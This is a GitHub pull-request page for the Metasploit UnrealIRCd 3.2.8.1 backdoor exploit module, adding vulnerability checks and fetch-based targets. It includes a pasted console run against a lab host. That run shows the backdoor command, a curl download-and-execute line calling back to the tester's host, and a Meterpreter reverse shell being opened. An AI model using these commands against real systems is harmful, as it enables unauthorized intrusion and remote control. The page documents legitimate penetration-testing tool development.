Unreal_ircd_3281_backdoor: Add checks & targets#20952
Merged
bwatters-r7 merged 6 commits intorapid7:masterfrom Feb 24, 2026
Merged
Unreal_ircd_3281_backdoor: Add checks & targets#20952bwatters-r7 merged 6 commits intorapid7:masterfrom
bwatters-r7 merged 6 commits intorapid7:masterfrom
Conversation
Contributor
|
Note to self- check if payload selection works on this module |
dwelch-r7
reviewed
Feb 12, 2026
bwatters-r7
reviewed
Feb 12, 2026
Contributor
Author
|
Thanks for your time @dwelch-r7 & @bwatters-r7 ! |
bwatters-r7
reviewed
Feb 18, 2026
Fetch over CmdStager (& multiple targets)
This is based on MR feedback
4c5142e to
f65dca1
Compare
Contributor
Author
|
Just done a force push. Result $ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; check; run'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/linux/http/x86/meterpreter/reverse_tcp
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: romona
[*] 10.0.0.10:6667 - NICK romona
[*] 10.0.0.10:6667 - USER romona 0 * romona
:irc.Metasploitable.LAN 001 romona :Welcome to the TestIRC IRC Network romona!romona@10.0.0.1
:irc.Metasploitable.LAN 002 romona :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
:irc.Metasploitable.LAN 003 romona :This server was created Sun May 20 2012 at 14:04:37 EDT
:irc.Metasploitable.LAN 004 romona irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.Metasploitable.LAN 005 romona UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irc.Metasploitable.LAN 005 romona WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irc.Metasploitable.LAN 005 romona EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[*] 10.0.0.10:6667 - The target appears to be vulnerable.
[*] Command to run on remote host: curl -so ./wCTrvPzx http://10.0.0.1:8080/w4fGVgXiKHSuZJ1djTweGw;chmod +x ./wCTrvPzx;./wCTrvPzx&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w4fGVgXiKHSuZJ1djTweGw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] Client 10.0.0.10 requested /w4fGVgXiKHSuZJ1djTweGw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60114) at 2026-02-20 09:01:51 +0000
meterpreter > |
bwatters-r7
reviewed
Feb 21, 2026
Contributor
|
bwatters-r7
approved these changes
Feb 24, 2026
Contributor
Release NotesEnhances the |
Contributor
Author
|
Thanks @bwatters-r7 :D |
Merged
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
After
Setup:
Check:
Target 0:
Target 1: